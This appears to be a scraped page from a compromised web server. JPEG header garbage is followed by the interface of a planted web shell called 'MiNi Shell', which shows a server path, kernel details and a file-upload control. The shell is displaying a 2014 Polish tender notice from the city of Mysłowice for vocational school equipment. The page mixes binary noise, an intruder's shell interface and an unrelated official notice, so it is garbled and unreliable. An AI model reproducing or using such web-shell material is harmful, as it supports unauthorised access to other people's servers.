JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140411/125094-N-2014.html

<p class="kh_header"><b>Mysłowice: Zakup pracowni praktycznej nauki zawodu wraz z dostawą pomocy dydaktycznych w ramach projektu systemowego Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.2 z podziałem 
na 9 części zamówienia</b><br>
<b>Numer ogłoszenia: 125094 - 2014; data zamieszczenia: 11.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Mysłowice , Ul. Powstańców 1, 41-400 Mysłowice, woj. śląskie, tel. 32 223 40 75, faks 32 223 40 75; 222 25 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myslowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup pracowni praktycznej nauki zawodu wraz z dostawą pomocy dydaktycznych w ramach projektu systemowego Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.2 z podziałem 
na 9 części zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zadanie pod nazwą: Zakup pracowni praktycznej nauki zawodu wraz z dostawą pomocy dydaktycznych w ramach projektu systemowego Mam zawód - mam pracę w regionie współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.2 z podziałem na 9 części zamówienia, w tym:
1) część zamówienia nr 1: Zakup dostawa i montaż pracowni informatycznej dla Zespołu Szkół Ponadgimnazjalnych nr 1 w Mysłowicach w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- jednostka centralna - 15 szt.,
- monitor - 15 szt.,
- serwer - 1 szt.,
- UPS - 1 szt.,
- drukarka - 1 szt.,
- projektor multimedialny - 1 szt.
Wymagane minimalne parametry techniczne oraz szczególne wymagania wobec przedmiotu zamówienia stanowiącego część nr 1 - zostały określone w zał. nr 12 do siwz.;
2) część zamówienia nr 2: Zakup dostawa i montaż pracowni informatycznej dla Zespołu Szkół Ponadgimnazjalnych nr 2 w Mysłowicach w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- jednostka centralna - 17 szt.,
- monitor - 17 szt.,
- projektor multimedialny - 1 szt.,
- urządzenie wielofunkcyjne - 1 szt.,
- Router Wi-fi - 1 szt.,
- czytnik kodów kreskowych - 1 szt.
Wymagane minimalne parametry techniczne oraz szczególne wymagania wobec przedmiotu zamówienia stanowiącego część nr 2 - zostały określone w zał. nr 12 do siwz.;
3) część zamówienia nr 3: Zakup dostawa i montaż pracowni języków obcych dla Zespołu Szkół Ponadgimnazjalnych nr 2 w Mysłowicach w ramach projektu Mam zawód - mam pracę w regionie, w tym cyfrowa pracownia języków obcych na 16 stanowisk uczniowskich + 1 nauczyciel wraz z dostawą, montażem
i szkoleniem dla nauczyciela:
- zestaw komputerowy - 1 szt.,
- moduł/moduły umożliwiający/umożliwiające podłączenie systemu do komputera przez USB - 1 lub 16 szt.,
- aplikacja do sterowania pracownią z komputera - 1 szt.,
- aplikacja do odtwarzania i rejestracji dźwięków - 1 szt.,
- przyłącza stanowisk uczniowskich - 16 szt.,
- słuchawki z wbudowanym dynamicznym mikrofonem - 17 szt.,
- okablowanie - 17 szt., 
- biurko nauczycielskie z szafką na komputer i dokumenty - 1 szt.,
- stoły uczniowskie - 8 lub 16 szt.
opcjonalnie 16 jednoosobowych/8 dwuosobowych,
- krzesła - 17 szt.,
- projektor multimedialny - 1 szt.
Minimalne funkcje realizowane w pracowni oraz wymagania dodatkowe przedmiotu zamówienia stanowiącego część nr 3 - zostały określone w zał. nr 12 do siwz.;
4) część zamówienia nr 4: Zakup i dostawa oprogramowania komputerowego w ramach projektu
Mam zawód - mam pracę w regionie: w ramach licencji Zamawiający wymaga kart licencji w języku polskim, nośników plików instalacyjnych, instrukcję instalacji. Zamawiane oprogramowanie przeznaczone jest 
do zestawów komputerowych bez ograniczeń czasowych z możliwością przenoszenia między stanowiskami.
Opis przedmiotu zamówienia stanowiącego część nr 4 - został określony w zał. nr 12 do siwz.;
5) część zamówienia nr 5: Zakup i dostawa materiałów biurowych w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- kalkulator - 50 szt.,
- aparat telefoniczny - 1 szt.,
- ołówek - 50 szt.,
- wizytownik - 1 szt.,
- tablica - 1 szt.,
- papier Flipchart - 5 szt.,
- druki akcydensowe wykorzystywane w handlu:
- faktura VAT - 40 szt.,
- faktura korygująca - 20 szt.,
- nota korygująca - 20 szt.,
- rachunek dla zwolnionych podmiotowo z VAT - 20 szt.,
- zamówienie ogólne - 10 szt.,
- Wz/wydanie na zewnątrz - 10 szt.,
- Pz/przyjęcie z zewnątrz - 10 szt.,
- druki akcydensowe wykorzystywane w handlu:
- faktura VAT - 20 szt.,
- faktura korygująca - 10 szt.,
- nota korygująca - 10 szt.,
- arkusz spisu z natury - 10 szt.,
- zgłoszenie reklamacyjne - 10 szt.,
- kartoteki magazynowe - 10 opak.,
- Wz/wydanie na zewnątrz - 10 szt.,
- Pz/przyjęcie z zewnątrz - 10 szt.,
- druki akcydensowe wykorzystywane w zatrudnieniu:
- umowa o pracę - 20 szt.,
- umowa zlecenie - 20 szt.,
- świadectwo pracy - 20 szt.,
- druki akcydensowe stosowane w wymianie towarowej:
- faktura VAT - 49 szt.,
- międzynarodowy list przewozowy CMR - 49 szt.,
- Wz/wydanie na zewnątrz - 49 szt.,
- Pz/przyjęcie z zewnątrz - 49 szt.,
- torebki foliowe - 1 opak.,
- blok - 1 szt.,
- klej - 1 szt.,
- papier pakowy - 1 szt.,
- nożyczki - 1 szt.,
- taśma samoprzylepna - 1 szt.,
- gumka - 1 szt.,
- linijka - 1 szt.,
- marker - 2 szt.,
- komplet przyborów kreślarskich - 10 komp.,
- karta biblioteczna do wydruku kodów kreskowych - 10 szt.,
- zestaw nalepek do wydruku kodów kreskowych - 6 szt.
Opis przedmiotu zamówienia stanowiącego część nr 5 - został określony w zał. nr 12 do siwz.;
6) część zamówienia nr 6: Zakup i dostawa pomocy dydaktycznych na potrzeby zawodu sprzedawca w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- metkownica - 2 szt.,
- ulotnik pionowy - 2 szt.,
- ulotnik poziomy - 1 szt.,
- stojak - 2 szt.,
- cenówka - 1 opak.,
- tester banknotów - 2 szt.
Opis przedmiotu zamówienia stanowiącego część nr 6 - został określony w zał. nr 12 do siwz.;
7) część zamówienia nr 7: Zakup i dostawa pomocy dydaktycznych - sprzętu elektronicznego w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- zarabiarka gniazd RJ45 - 3 szt.,
- zarabiarka wtyków RJ45 - 12 szt.,
- tester napięcia - 3 szt.,
- tester płyt głównych P.O.S.T. ISA - 4 szt.,
- tester zasilaczy ATX - 4 szt.,
- tester kabli - 4 szt.,
- mierniki elektryczne - 15 szt.,
- listwa zasilająca - 1 szt.,
- pendrive - 1 szt.,
- ekran projekcyjny ścienny - 4 szt.,
- ekran projekcyjny na statywie - 1 szt.,
- słuchawki z mikrofonem - 30 szt.
Opis przedmiotu zamówienia stanowiącego część nr 7 - został określony w zał. nr 12 do siwz.;
8) część zamówienia nr 8: Zakup i dostawa książek, prasy oraz filmów DVD w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- mapa - 3 szt.,
- zestaw plansz dydaktycznych - 1 szt.,
- film szkoleniowy - 2 szt.,
- ćwiczenia - 15 szt.,
- czasopismo - 48 szt.,
- film edukacyjno-szkoleniowy - 4 szt.,
- podręcznik - 211 szt.,
- testy - 8 szt.,
- tablica demonstracyjna - 5 szt.,
- zestaw edukacyjny - 5 szt.
Opis przedmiotu zamówienia stanowiącego część nr 8 - został określony w zał. nr 12 do siwz.;
9) część zamówienia nr 9: Zakup i dostawa pomocy dydaktycznych - narzędzi budowlanych w ramach projektu Mam zawód - mam pracę w regionie, w tym:
- komplet akcesoriów budowlanych - 1 komplet (w tym: poziomica, szpachla, kielnia trójkątna, pędzel, wałek, paca, pojemnik budowlany, wiadro, piła, sznurek murarski po - 1 szt.),
- elektronarzędzia budowlane: szlifierka kątowa - 1 szt.,
- elektronarzędzia budowlane: wiertarko-wkrętarka - 1 szt.,
- elektronarzędzia budowlane: mieszadło - 1 szt.,
- narzędzia budowlane: przecinarka do glazury - 2 szt.,
- komplet akcesoriów budowlanych na lekcje pokazowe - 2 komplety (w tym: cegła klinkierowa - 3 szt., płyta k-g - 1 szt., płyta osb - 1 szt., tapeta - 2 rolki, płytka elewacyjna - 1 m2, glazura - 1 m2, bloczek betonowy 
- 1 szt., profil ścienny U - 1 paczka, stelaż do montażu płyt - 1 szt.). 
Opis przedmiotu zamówienia stanowiącego część nr 9 - został określony w zał. nr 12 do siwz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium (dla części nr 1÷9) w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik. 
2. Pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  
3. Wykonawca, o którym mowa w art. 26 ust. 2b zd. 1 uPzp, zobowiązany jest do udowodnienia Zamawiającemu okoliczności wskazanych w tym zdaniu, na zasadach o których mowa w zd. 2 art. 26 ust. 2b (w szczególności pisemne zobowiązanie tych podmiotów - zał. nr 8 do siwz).
4. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedłożenia dokumentów dotyczących w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu, 
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
5. Karta ofertowa (zał. nr 9 do siwz).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część nr 1÷3: 
1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie,
w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
2. Zamawiający dopuszcza zmianę, o której mowa w pkt. poprzedzającym, w odniesieniu do:
2.1) zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy
do aktualnego stanu prawnego;
2.2) danych teleadresowych wykonawcy;
2.3) aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu urządzeń
lub materiałów) - zmiana nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której 
był dokonany wybór wykonawcy. Zmiana może dotyczyć sytuacji, gdy model towaru określony w ofercie, 
a następnie w umowie, przestał być produkowany i jest niedostępny, co będzie potwierdzone stosownym dokumentem. W takiej sytuacji wykonawca może zaproponować inny model towaru, który musi spełniać warunki określone w specyfikacji istotnych warunków zamówienia, za cenę określoną w ofercie i umowie;
2.4) podwykonawcy/ów/ podanego/ych/ w ofercie wykonawcy;
2.5) części zamówienia realizowanej z udziałem podwykonawcy/ów/, wskazanej w ofercie wykonawcy;
2.6) terminu realizacji przedmiotu umowy - w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznie niemożliwego do przewidzenia i niemożliwego do zapobieżenia;
2.7) danych adresowych miejsca dostawy przedmiotu umowy;
2.8) osoby/osób/ wyznaczonej/ych/ do odbioru przedmiotu umowy ze strony Zamawiającego;
2.9) osoby/osób/ odpowiedzialnej/ych/ za wykonanie przedmiotu umowy ze strony wykonawcy;
2.10) wysokości wynagrodzenia w związku ze zmianą przepisów podatkowych - w przypadku ustawowej zmiany stawki podatku VAT, wynagrodzenie należne wykonawcy podlega zmianie odpowiednio o kwotę podatku VAT wynikającą ze zmienionej stawki VAT, obowiązującej w chwili powstania obowiązku podatkowego.
3. Zmiana postanowień zawartej umowy w odniesieniu do osoby/osób/ wyznaczonej/ych/ do odbioru przedmiotu umowy ze strony Zamawiającego oraz osoby/osób/ odpowiedzialnej/ych/ za wykonanie przedmiotu umowy ze strony wykonawcy, może nastąpić w przypadku:
3.1) choroby lub innych zdarzeń losowych uniemożliwiających wykonywanie obowiązków wynikających
z umowy;
3.2) nie wywiązywania się z obowiązków wynikających z umowy;
3.3) rezygnacji z wykonywania obowiązków wynikających z umowy.
Część nr 4÷9: 
1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
2. Zamawiający dopuszcza zmianę, o której mowa w pkt. poprzedzającym, w odniesieniu do:
2.1) zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy
do aktualnego stanu prawnego;
2.2) danych teleadresowych wykonawcy;
2.3) aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu urządzeń 
lub materiałów) - zmiana nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której 
był dokonany wybór wykonawcy. Zmiana może dotyczyć sytuacji, gdy model towaru określony w ofercie, 
a następnie w umowie, przestał być produkowany i jest niedostępny, co będzie potwierdzone stosownym dokumentem. W takiej sytuacji wykonawca może zaproponować inny model towaru, który musi spełniać warunki określone w specyfikacji istotnych warunków zamówienia, za cenę określoną w ofercie i umowie;
2.4) podwykonawcy/ów/ podanego/ych/ w ofercie wykonawcy;
2.5) części zamówienia realizowanej z udziałem podwykonawcy/ów/, wskazanej w ofercie wykonawcy;
2.6) terminu realizacji przedmiotu umowy - w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznie niemożliwego do przewidzenia i niemożliwego do zapobieżenia;
2.7) danych adresowych miejsca dostawy przedmiotu umowy;
2.8) osoby/osób/ wyznaczonej/ych/ do odbioru przedmiotu umowy ze strony Zamawiającego;
2.9) osoby/osób/ odpowiedzialnej/ych/ za wykonanie przedmiotu umowy ze strony wykonawcy;
2.10) wysokości wynagrodzenia w związku ze zmianą przepisów podatkowych - w przypadku ustawowej zmiany stawki podatku VAT, wynagrodzenie należne wykonawcy podlega zmianie odpowiednio o kwotę podatku VAT wynikającą ze zmienionej stawki VAT, obowiązującej w chwili powstania obowiązku podatkowego.
3. Zmiana postanowień zawartej umowy w odniesieniu do osoby/osób/ wyznaczonej/ych/ do odbioru przedmiotu umowy ze strony Zamawiającego oraz osoby/osób/ odpowiedzialnej/ych/ za wykonanie przedmiotu umowy ze strony wykonawcy, może nastąpić w przypadku:
3.1) choroby lub innych zdarzeń losowych uniemożliwiających wykonywanie obowiązków wynikających
z umowy;
3.2) nie wywiązywania się z obowiązków wynikających z umowy;
3.3) rezygnacji z wykonywania obowiązków wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.myslowice.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mysłowice, Wydział Zamówień Publicznych - pok. nr 307, ul. Powstańców 1, 41-400 Mysłowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 10:00, miejsce: oferty należy składać w Wydziale Zamówień Publicznych Urzędu Miasta Mysłowice, ul. Powstańców 1 - pok. nr 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie obejmujące zakup pracowni praktycznej nauki zawodu wraz z dostawą pomocy dydaktycznych z podziałem na 9 części w ramach projektu systemowego Mam zawód - mam pracę w regionie jest współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.2. Udział tych środków w wartości zamówienia wynosi 85 %.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup dostawa i montaż pracowni informatycznej dla Zespołu Szkół Ponadgimnazjalnych nr 1 w Mysłowicach w ramach projektu Mam zawód - mam
pracę w regionie.</p>
